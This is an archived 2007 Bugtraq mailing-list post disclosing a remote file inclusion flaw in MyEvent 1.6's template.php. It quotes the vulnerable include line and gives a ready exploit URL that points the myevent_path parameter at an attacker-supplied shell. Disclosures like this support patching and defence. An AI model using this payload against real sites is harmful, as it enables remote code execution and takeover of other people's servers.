[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
MyEvent1.6 (template.php) Remote File Inclusion Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: MyEvent1.6 (template.php) Remote File Inclusion Vulnerability
- From: yaser@xxxxxxxxxxxx
- Date: 2 Jun 2007 07:07:53 -0000
#########################################################################
#
# MyEvent1.6 (template.php) Remote File Inclusion Vulnerability
#
# Author: Yaser <yaser@xxxxxxxxxxxx>
#
# Homepage: http://www.ayyildiz.org
#
#########################################################################
#########################################################################
# Download S : http://mywebland.com/download.php?id=6
#
# ERROR:
#
# include_once($myevent_path.'includes/template.php')
#
# Exploit:
# http://[site]/[PaTh]/includes/template.php?myevent_path=[shell]
#
#########################################################################
Thanks: ir4dex - ht08 - ajann - H0tturk - Zakix - Devil Hacker